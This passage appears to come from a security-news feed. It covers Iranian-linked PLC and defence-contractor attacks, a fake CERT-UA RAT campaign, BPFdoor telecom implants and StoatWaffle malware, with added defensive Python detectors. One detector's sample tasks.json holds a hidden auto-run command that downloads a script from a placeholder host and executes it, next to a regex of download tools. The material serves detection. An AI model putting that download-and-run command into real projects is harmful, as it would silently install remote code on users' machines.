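ALLOWED_SOURCES = [ipaddress.ip_network("10.20.0.0/24")]
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def in_any(ip, nets):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def find_suspicious_ot_flows(log_text, allowed_nets=ALLOWED_SOURCES):
    """Return one finding per flow that hits an OT port from outside allowed_nets.
    rfc1918=False marks a source that is not even an internal address."""
    findings = []
    for row in csv.DictReader(io.StringIO(log_text)):
        try:
            port = int(row["dst_port"])
        except (KeyError, ValueError):
            continue  # malformed line; skip rather than crash the sweep
        if port not in OT_PORTS or in_any(row["src_ip"], allowed_nets):
            continue
        findings.append({
            "time": row["timestamp"],
            "src": row["src_ip"],
            "dst": row["dst_ip"],
            "port": port,
            "service": OT_PORTS[port],
            "rfc1918": in_any(row["src_ip"], RFC1918),
        })
    return findings


def summarize_by_source(findings):
    """Group findings by source. A source that reaches a PLC protocol port and
    port 22 matches the advisory's engineering-tool access followed by SSH."""
    ports_by_src = {}
    for f in findings:
        ports_by_src.setdefault(f["src"], set()).add(f["port"])
    return {
        src: {"ports": sorted(ports), "plc_then_ssh": bool(ports & PLC_PROTOCOL_PORTS) and 22 in ports}
        for src, ports in ports_by_src.items()
    }


# Constructed sample flow export; 203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges standing in for overseas/leased infrastructure.
SAMPLE_LOG = """timestamp,src_ip,dst_ip,dst_port,proto
2026-03-01T02:11:04Z,10.20.0.15,10.30.1.10,44818,tcp
2026-03-01T02:13:40Z,203.0.113.77,10.30.1.10,44818,tcp
2026-03-01T02:13:41Z,203.0.113.77,10.30.1.10,2222,tcp
2026-03-01T02:15:02Z,203.0.113.77,10.30.1.10,22,tcp
2026-03-01T02:20:00Z,198.51.100.9,10.30.1.11,502,tcp
2026-03-01T02:21:00Z,10.20.0.15,10.30.1.11,443,tcp
2026-03-01T02:22:00Z,10.50.7.3,10.30.1.12,102,tcp
"""

if __name__ == "__main__":
    hits = find_suspicious_ot_flows(SAMPLE_LOG)
    for h in hits:
        origin = "internal, not approved" if h["rfc1918"] else "EXTERNAL"
        print(f'{h["time"]} {h["src"]} -> {h["dst"]}:{h["port"]} {h["service"]} [{origin}]')
    for src, s in summarize_by_source(hits).items():
        print(f'{src}: ports {s["ports"]} plc_then_ssh={s["plc_then_ssh"]}')
```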

A Shift in Cyber Threat Priorities

The bigger takeaway is the shift in attacker focus. By targeting PLCs, threat actors are going straight to the systems that control physical processes. This marks a move from cyber intrusion to potential real-world disruption. The advisory also highlights the role of manufacturers, urging a stronger push toward “secure-by-design” systems that are not exposed by default. For now, the warning is clear: as long as industrial systems remain exposed, campaigns like this Iranian-affiliated APT targeting of PLCs are likely to continue, and could become more disruptive over time.
  • ✇Security Affairs
  • Pro-Iran Handala group breached Israeli defence contractor PSK Wind Technologies Pierluigi Paganini

Pro-Iran Handala group breached Israeli defence contractor PSK Wind Technologies

3 de Abril de 2026, 04:52

Iran-linked hackers claim to have breached Israeli air defence contractor PSK Wind, which develops command and control systems.

Pro-Iran Handala group announced on April 2 that it breached PSK Wind Technologies, an Israeli engineering and IT firm specializing in integrated systems for defense and critical communications, including command and control solutions.

Handala appears as a pro-Palestinian hacktivist group but is widely seen as a front for Iran-backed Void Manticore, as reported by SecurityWeek. Known for phishing, data theft, extortion, and destructive wiper attacks, they also engage in info operations and psychological warfare. Since the Iran conflict began, they’ve targeted Israeli military servers, intelligence officers, and companies, stealing or wiping data.

Handala claims to have stolen sensitive data from PSK Wind, including documents on command and control systems, allegedly sending it to “Axis of Resistance” missile units. The Axis of Resistance is an Iran-led political and military alliance of groups opposing Israel, the US, and allies, including Hezbollah in Lebanon, Palestinian Islamic Jihad, Syrian regime forces, and Shia militias in Iraq like Kata’ib Hezbollah.

Handala issued a threat coinciding with Passover, a major Jewish holiday that commemorates the Israelites’ liberation from slavery in ancient Egypt, warning of attacks on Israeli defense and command centers.

At this time, neither PSK Wind nor the Israeli military has commented, while the group released confidential files showcasing top secret communications systems, internal documents, location photos and more.

🚨🇮🇷 BREAKING: Iranian nation-state threat actor Handala has breached Israeli defense contractor PSK Wind Technologies.

They've released confidential files showcasing top secret communications systems, internal documents, location photos and more. pic.twitter.com/w2Li9P1ZLp

— International Cyber Digest (@IntCyberDigest) April 2, 2026

The PSK Wind attack is part of an ongoing wave of cyber attacks on Israeli military infrastructure since February 28, coinciding with missile and drone strikes by Iran and its allies. Hackers claim the firm manages Israel’s air defence command centers, critical to systems like Iron Dome.

Since the U.S.-Israeli war with Iran began in February, the Iran-linked group Handala has intensified its cyberattacks. It claimed responsibility for a destructive breach at medical tech firm Stryker that targeted its internal Microsoft environment and remotely wiped tens of thousands of employee devices without using malware. 

The group claimed it wiped more than 200,000 servers, mobile devices, and other systems, forcing the company to shut down offices across 79 countries. The hacktivists also claimed they exfiltrated about 50TB of corporate data from the company’s infrastructure.

Recently, the Iran-linked hacking group Handala claimed the hack of the FBI Director Kash Patel’s personal Gmail account and shared alleged data, including photos and files.

The FBI is offering up to $10 million for information on the Handala hackers.


Pierluigi Paganini

(SecurityAffairs – hacking, Handala)

  • ✇Firewall Daily – The Cyber Express
  • Hackers Impersonate Ukrainian CERT to Plant a RAT on Government, Hospital Networks Mihir Bagwe

Hackers Impersonate Ukrainian CERT to Plant a RAT on Government, Hospital Networks

30 de Março de 2026, 05:45


Ukraine's frontline cyber defense agency became the subject of its own investigation last week after an unknown threat actor built a convincing fake version of its website, sent emails impersonating its staff and instructed recipients across the country to download malware packaged as official security software.

The Computer Emergency Response Team of Ukraine, CERT-UA, disclosed on Sunday that between March 26 and 27, attackers distributed emails falsely attributed to CERT-UA, urging recipients to download a password-protected archive named either "CERT_UA_protection_tool.zip" or "protection_tool.zip". The file was made available for download from the Files.fm file-sharing service and installed what the messages described as specialized protective software.

The phishing emails were targeted at a broad cross-section of Ukrainian institutions including government organizations, medical centers, security companies, educational institutions, financial institutions and software development firms.

Supporting the phishing campaign, attackers had registered and populated a counterfeit website at cert-ua[.]tech — a domain created on March 27, just one day into the distribution window. The look-alike website had content lifted directly from the official CERT-UA website at cert[.]gov[.]ua, alongside fabricated instructions for downloading the malicious "protection tool."

The executable file inside those archives was not protective software. CERT-UA classified it as AGEWHEEZE, a full-featured Remote Access Trojan (RAT) written in the Go programming language. A RAT is malware that gives an attacker complete remote control over an infected machine: not just file access, but live screen viewing, keyboard and mouse emulation, command execution, process and service management, clipboard reading and writing, and the ability to shut down, restart, or lock the device entirely. AGEWHEEZE's command set is exhaustive and purpose-built for persistent, covert control. It supports screen capture and real-time input emulation, full file system operations including read, write, delete, rename, and directory creation, process killing, service control, autorun management, terminal access, and the ability to open arbitrary URLs on the victim machine.

AGEWHEEZE establishes persistence through the Windows registry startup key, the Startup directory, or a scheduled task, creating entries named "SvcHelper" or "CoreService" depending on the infection path. All communications to its command-and-control server route over WebSocket connections to a server hosted on infrastructure belonging to French cloud provider OVH.

That command-and-control server carried its own revealing details. On port 8443, a web page titled "The Cult" displayed an authentication form. Buried in the HTML source of that page, investigators found Russian-language text reading: "Membership suspended. Your access to the Cult has been blocked. Contact the administrator to restore it." The self-signed SSL certificate on the server was created on March 18, with "TVisor" listed in the Organization field, matching the internal package name found inside the malware itself: "/example.com/tvisor/agent".

Attribution arrived quickly and from the attackers themselves. A review of the AI-generated fake website at cert-ua[.]tech uncovered a line embedded in the HTML code reading: "With Love, CYBER SERP — https://t[.]me/CyberSerp_Official."

Image: Fake website and HTML code embedding CyberSerp details. (Source: CERT-UA)

On March 28, the day after the campaign launched, the Telegram channel referenced in that code published a message claiming responsibility for the attack, eliminating any ambiguity about attribution. CERT-UA created the tracking identifier UAC-0255 for this activity. The agency assessed the cyberattack as "unsuccessful." No more than a few personal devices belonging to employees of educational institutions were identified as infected.

CERT-UA said its specialists provided methodological and practical assistance to affected parties, and acknowledged Ukrainian electronic communications providers for their contribution to delivering cyber threat information to subscribers and maintaining national cyber incident response infrastructure.

CERT-UA itself has previously documented campaigns by multiple threat groups — including UAC-0002, UAC-0035, and the group tracked here as UAC-0252 — that similarly weaponize government branding. In this case, the attackers targeted the cyber defense agency whose name carries the highest authority in Ukrainian information security communications, turning that trust directly against the institutions that rely on it.

CERT-UA noted that the development of artificial intelligence significantly simplifies the execution of cyber threats. The attackers' own use of an AI-generated phishing site is a direct illustration of that warning, the cyber defense agency explained. It recommended that organizations reduce their attack surface by configuring standard operating system protections including Software Restriction Policies and AppLocker, and deploying specialized endpoint protection tools. Full indicators of compromise including file hashes, network indicators, and host-based artifacts are available in the CERT-UA advisory.
  • ✇Security Affairs
  • China-linked Red Menshen APT deploys stealthy BPFDoor implants in telecom networks Pierluigi Paganini

China-linked Red Menshen APT deploys stealthy BPFDoor implants in telecom networks

27 de Março de 2026, 03:16

China-linked Red Menshen APT group used stealthy BPFDoor implants in telecom networks to spy on government targets.

Rapid7 Labs uncovered that a China-linked threat group known as Red Menshen has been running a long-term espionage campaign by infiltrating telecom networks, mainly in the Middle East and Asia. Active since at least 2021, the group uses highly stealthy BPFDoor implants to maintain hidden access inside critical infrastructure.

This strategic positioning allows attackers to quietly monitor and potentially spy on government communications. Researchers describe these implants as extremely hard to detect, acting like “digital sleeper cells” embedded deep within telecom environments for prolonged surveillance.

Compromised telecoms threaten entire populations, not just individual companies, as they carry critical communications and digital identities. Over the past decade, similar state-backed intrusions have targeted multiple countries, exposing call records, sensitive communications, and trusted operator links, revealing a worrying global pattern.

Investigations reveal a structured, long-term campaign by a China-linked threat actor targeting telecommunications infrastructure. Rather than short-term intrusions, the operation plants “sleeper cells”, dormant footholds embedded deep within networks to maintain persistent access over extended periods. Recurring tools in the attackers’ arsenal include kernel-level implants, passive backdoors, credential-harvesting utilities, and cross-platform command frameworks, forming a layered, stealthy access model. Experts highlighted the central role of BPFdoor, a Linux backdoor operating within the kernel that activates only when triggered by specially crafted packets, without exposing ports or command-and-control channels. By positioning below traditional visibility layers, this approach complicates detection and demonstrates a shift toward deep, covert tradecraft. BPFdoor is not an isolated tool but part of a broader, scalable intrusion model targeting telecom environments at high stealth.

Modern telecom networks are built in layers, making them highly valuable targets. At the edge are customer-facing systems like base stations, routers, VPNs, and firewalls, which connect to the core backbone that carries massive volumes of global traffic.

Deeper inside sits the control plane, where critical systems manage subscribers, authentication, billing, and signaling using protocols like SS7 and Diameter. Much of this infrastructure runs on Linux or BSD systems, meaning a kernel-level backdoor can place attackers close to sensitive data and communication flows.

Attacks usually begin at the network edge by exploiting exposed services or valid accounts on devices like VPNs, firewalls, and virtualization hosts. Once inside, attackers deploy tools such as CrossC2 for command execution, TinyShell for stealthy persistence, and keyloggers or brute-force tools to steal credentials and move laterally toward core systems.

A key tool is BPFdoor, a stealthy Linux backdoor that hides in the kernel and activates only when it receives a specially crafted “magic” packet.

“BPFdoor first came to broader public attention around 2021, when researchers uncovered a stealthy Linux backdoor used in long-running espionage campaigns targeting telecommunications and government networks. The BPFDoor source code reportedly leaked online in 2022, making the previously specialized Linux backdoor more accessible to other threat actors.” reads the report published by Rapid7. “Normally, BPF is used by tools like tcpdump or libpcap to capture specific network traffic, such as filtering for TCP port 443. It operates partly in kernel space, meaning it processes packets before they reach user-space applications. BPFdoor abuses this capability. Rather than binding to a visible listening port, the implant installs a custom BPF filter inside the kernel that inspects incoming packets for a specific pattern, a predefined sequence of bytes often referred to as a “magic packet” or “magic byte”.”

Like a hidden lock that opens with the right code, it leaves no visible trace, making detection extremely difficult while enabling long-term, covert access across telecom environments.

Rapid7 Labs hunted BPFdoor variants by analyzing ELF samples and grouping them by code similarity, revealing both recurring clusters and outliers. Using custom tools, they discovered new features, including a variant “F” with a 26-instruction BPF filter and updated magic packets. Some samples inspect SCTP traffic, giving attackers access to telecom signaling, subscriber data, and location tracking. Other tactics include mimicking bare-metal servers like HPE ProLiant or container services such as Docker to blend into telecom hardware and 5G core environments. These strategies allow implants to remain hidden while embedding directly into the backbone, turning persistence into deep visibility across critical networks.

According to Rapid7, recent BPFdoor variants show significant evolution in stealth and control. Instead of simple magic packets, triggers are now hidden inside legitimate HTTPS traffic, passing through proxies, load balancers, and firewalls.

A clever padding mechanism, called the 26- or 40-byte “magic ruler,” ensures the activation marker lands at a fixed offset, surviving header changes. The malware also uses lightweight RC4-MD5 encryption for fast command execution and reuses proven routines from prior Chinese-linked malware. ICMP packets are used as a small control channel between infected systems. A special marker (0xFFFFFFFF) tells the receiving host to execute commands, letting attackers manage multiple compromised servers quietly across telecom and enterprise networks.
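The host-side footprint of a BPFdoor-style implant is what the report describes: a raw AF_PACKET socket with a kernel filter attached and no listening port, held by a process that may not look like a capture tool. The hunt below is an added example and not code from Rapid7's report; it assumes the Linux /proc layout (/proc/net/packet plus each process's fd table and comm name), an assumed allowlist of legitimate packet-socket users, and a constructed /proc sample so the logic can be checked offline.

```python
"""Find processes holding raw AF_PACKET sockets that are not known capture tools."""
import os
import re

# Assumption: the only programs expected to open packet sockets on this host.
EXPECTED_CAPTURE_TOOLS = {"tcpdump", "dhclient", "dhcpcd", "NetworkManager", "lldpd"}
SOCK_RAW = 3  # socket type column value for SOCK_RAW


def parse_proc_net_packet(text):
    """Return {inode: (type, proto)} for every AF_PACKET socket listed.
    /proc/net/packet columns: sk RefCnt Type Proto Iface R Rmem User Inode
    (Type is decimal, Proto is hex, e.g. 0003 = ETH_P_ALL, 0800 = ETH_P_IP)."""
    sockets = {}
    for line in text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 9:
            continue
        sockets[int(fields[8])] = (int(fields[2]), int(fields[3], 16))
    return sockets


def find_packet_socket_owners(sockets, fd_links):
    """Map packet-socket inodes back to PIDs.
    fd_links: {pid: {fd: readlink target}}; socket fds read 'socket:[inode]'."""
    owners = {}
    for pid, links in fd_links.items():
        for target in links.values():
            m = re.fullmatch(r"socket:\[(\d+)\]", target)
            if m and int(m.group(1)) in sockets:
                owners.setdefault(pid, []).append(int(m.group(1)))
    return owners


def suspicious_packet_socket_holders(sockets, fd_links, comm_by_pid, expected=EXPECTED_CAPTURE_TOOLS):
    """Return sorted [(pid, comm, [raw socket inodes])] for processes holding
    SOCK_RAW packet sockets whose command name is not an expected tool.
    A disguised process name is a weak signal on its own; confirm by checking
    that the process has no listening port and inspect its filter (ss -0 -bp)."""
    result = []
    for pid, inodes in find_packet_socket_owners(sockets, fd_links).items():
        raw = sorted(i for i in inodes if sockets[i][0] == SOCK_RAW)
        comm = comm_by_pid.get(pid, "?")
        if raw and comm not in expected:
            result.append((pid, comm, raw))
    return sorted(result)


def collect_live():
    """Gather the three inputs from a running Linux host (root needed to read
    other users' fd tables)."""
    with open("/proc/net/packet") as fh:
        sockets = parse_proc_net_packet(fh.read())
    fd_links, comm_by_pid = {}, {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        fd_dir = f"/proc/{pid}/fd"
        try:
            links = {fd: os.readlink(f"{fd_dir}/{fd}") for fd in os.listdir(fd_dir)}
            with open(f"/proc/{pid}/comm") as fh:
                comm_by_pid[int(pid)] = fh.read().strip()
        except OSError:
            continue  # process exited or permission denied; skip it
        fd_links[int(pid)] = links
    return sockets, fd_links, comm_by_pid


# Constructed sample: one tcpdump capture socket (inode 29512) and one raw
# socket (inode 31877) held by a process using an innocuous daemon name.
SAMPLE_PROC_NET_PACKET = """sk       RefCnt Type Proto  Iface R Rmem   User   Inode
0000000000000000 3      3    0003   2      1 0        0      29512
0000000000000000 3      3    0800   2      1 0        0      31877
"""
SAMPLE_FD_LINKS = {
    1204: {"3": "socket:[29512]", "4": "/dev/null"},
    4411: {"0": "/dev/null", "5": "socket:[31877]", "6": "socket:[31990]"},
}
SAMPLE_COMM = {1204: "tcpdump", 4411: "udevd"}

if __name__ == "__main__":
    if os.path.exists("/proc/net/packet"):
        inputs = collect_live()
    else:
        inputs = (parse_proc_net_packet(SAMPLE_PROC_NET_PACKET), SAMPLE_FD_LINKS, SAMPLE_COMM)
    for pid, comm, inodes in suspicious_packet_socket_holders(*inputs):
        print(f"pid {pid} ({comm}) holds raw packet socket(s) {inodes}")
```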

“BPFdoor and new eBPF malware families like Symbiote demonstrate how kernel packet filtering can be abused for stealth persistence. As defenders improve visibility at higher layers, adversaries are increasingly shifting implants deeper into the operating system.” concludes the report, which also provides Indicators of Compromise (IoCs).


Pierluigi Paganini

(SecurityAffairs – hacking, telecom)

  • ✇Security Affairs
  • North Korea-linked threat actors abuse VS Code auto-run to spread StoatWaffle malware Pierluigi Paganini

North Korea-linked threat actors abuse VS Code auto-run to spread StoatWaffle malware

24 de Março de 2026, 04:09

North Korea-linked threat actors use VS Code auto-run tasks to spread StoatWaffle malware via malicious projects that execute on folder open.

North Korea-linked threat actor Team 8 behind the Contagious Interview campaign is spreading StoatWaffle malware through malicious Microsoft Visual Studio Code projects. Since late 2025, they have abused the “tasks.json” auto-run feature in Microsoft Visual Studio Code to execute code whenever a folder is opened, downloading payloads from the web across operating systems, making this tactic both stealthy and effective.

“In the Contagious Interview campaign, Team 8 has been mainly using OtterCookie. Starting around December 2025, Team 8 started using new malware. We named this malware StoatWaffle.” reads the report published by NTT Security. “Team 8 leverages a project related to blockchain as a decoy. This malicious repository contains a .vscode directory that contains a tasks.json file. If a user opens and trusts this malicious repository with VSCode, it reads this tasks.json file.”

The task downloads payloads from Vercel and runs them via cmd.exe, starting with a simple downloader. It then installs Node.js if missing and fetches additional files, enabling further malware execution across operating systems.
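The auto-run behaviour described above can be checked for before a cloned project is trusted in the editor. The scanner below is an added example, not code from NTT Security's report; it assumes the VS Code tasks.json convention that a task carrying "runOptions": {"runOn": "folderOpen"} executes when the folder is opened, and the sample tasks.json (including its download host) is a constructed placeholder.

```python
"""Flag tasks in .vscode/tasks.json that auto-run on folder open, and note
whether they fetch and execute remote content or hide their terminal."""
import json
import re
from pathlib import Path

# Command fragments that suggest downloading and running something remote.
REMOTE_FETCH = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr|certutil|bitsadmin|powershell|cmd\.exe|node\s+-e)\b", re.I
)
URL = re.compile(r"https?://[^\s\"']+")


def load_jsonc(text):
    """tasks.json allows // comments and trailing commas; strip the common forms
    before parsing. This is a simplification, not a full JSONC parser."""
    no_comments = "\n".join(l for l in text.splitlines() if not l.lstrip().startswith("//"))
    no_trailing = re.sub(r",(\s*[}\]])", r"\1", no_comments)
    return json.loads(no_trailing)


def task_command_text(task):
    """Join command and args, including the per-OS overrides a task may carry."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    for key in ("windows", "linux", "osx"):
        os_cfg = task.get(key) or {}
        parts.append(str(os_cfg.get("command", "")))
        parts += [str(a) for a in os_cfg.get("args", [])]
    return " ".join(p for p in parts if p)


def find_autorun_tasks(tasks_json_text):
    """Return one finding per task whose runOptions.runOn is 'folderOpen'."""
    findings = []
    for task in load_jsonc(tasks_json_text).get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = task_command_text(task)
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "command": cmd,
            "fetches_remote": bool(REMOTE_FETCH.search(cmd)),
            "urls": URL.findall(cmd),
            "hidden": (task.get("presentation") or {}).get("reveal") == "never",
        })
    return findings


def scan_repo(repo_dir):
    """Scan a checked-out repository directory; no tasks.json means no findings."""
    path = Path(repo_dir) / ".vscode" / "tasks.json"
    return find_autorun_tasks(path.read_text(encoding="utf-8")) if path.exists() else []


# Constructed sample: a benign build task next to a hidden folderOpen task that
# pulls a script from a placeholder host and hands it to Node.js via cmd.exe.
SAMPLE_TASKS_JSON = """{
  // constructed sample tasks.json
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    {
      "label": "prepare-env",
      "type": "shell",
      "command": "cmd.exe",
      "args": ["/c", "curl -s https://example.invalid/loader.js -o %TEMP%\\\\l.js && node %TEMP%\\\\l.js"],
      "presentation": { "reveal": "never" },
      "runOptions": { "runOn": "folderOpen" },
    },
  ]
}
"""

if __name__ == "__main__":
    for f in find_autorun_tasks(SAMPLE_TASKS_JSON):
        flags = [k for k in ("fetches_remote", "hidden") if f[k]]
        print(f'auto-run task "{f["label"]}": {f["command"]}  flags={flags} urls={f["urls"]}')
```

Treat any folderOpen task as something to read before clicking "trust" in the workspace-trust prompt; a build task that does not need to run on open has no reason to use it.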

The StoatWaffle malware uses a multi-stage infection chain. It begins with a Node.js loader that repeatedly connects to a command-and-control (C2) server and executes any code it receives. A second downloader is then deployed, continuing this communication and quickly delivering additional malware modules.

One module acts as a stealer, collecting credentials from browsers, extension data, installed software details, and even macOS Keychain data, then sending everything back to the attacker. It can also access Windows data through WSL environments.

“Stealer module steals credentials stored on Web browsers and designated browser extension data and uploads them to C2 server. If the victim browser was Chromium family, it steals browser extension data (Appendix) besides stored credentials. If the victim browser was Firefox, it steals browser extension data besides stored credentials. It reads extensions.json and gets the list of browser extension names, then checks whether designated keyword is included.” continues the report. “If the victim OS was macOS, it also steals Keychain database.”

Another module works as a remote access trojan (RAT), allowing attackers to run commands on the infected system and receive results. Overall, the malware enables full data theft and remote control of compromised devices.

“StoatWaffle is a modular malware implemented by Node.js and it has Stealer and RAT modules. WaterPlum is continuously developing new malware and updating existing ones. We think it necessary to pay close attention to their activities.” concludes the report.


Pierluigi Paganini

(SecurityAffairs – hacking, StoatWaffle)
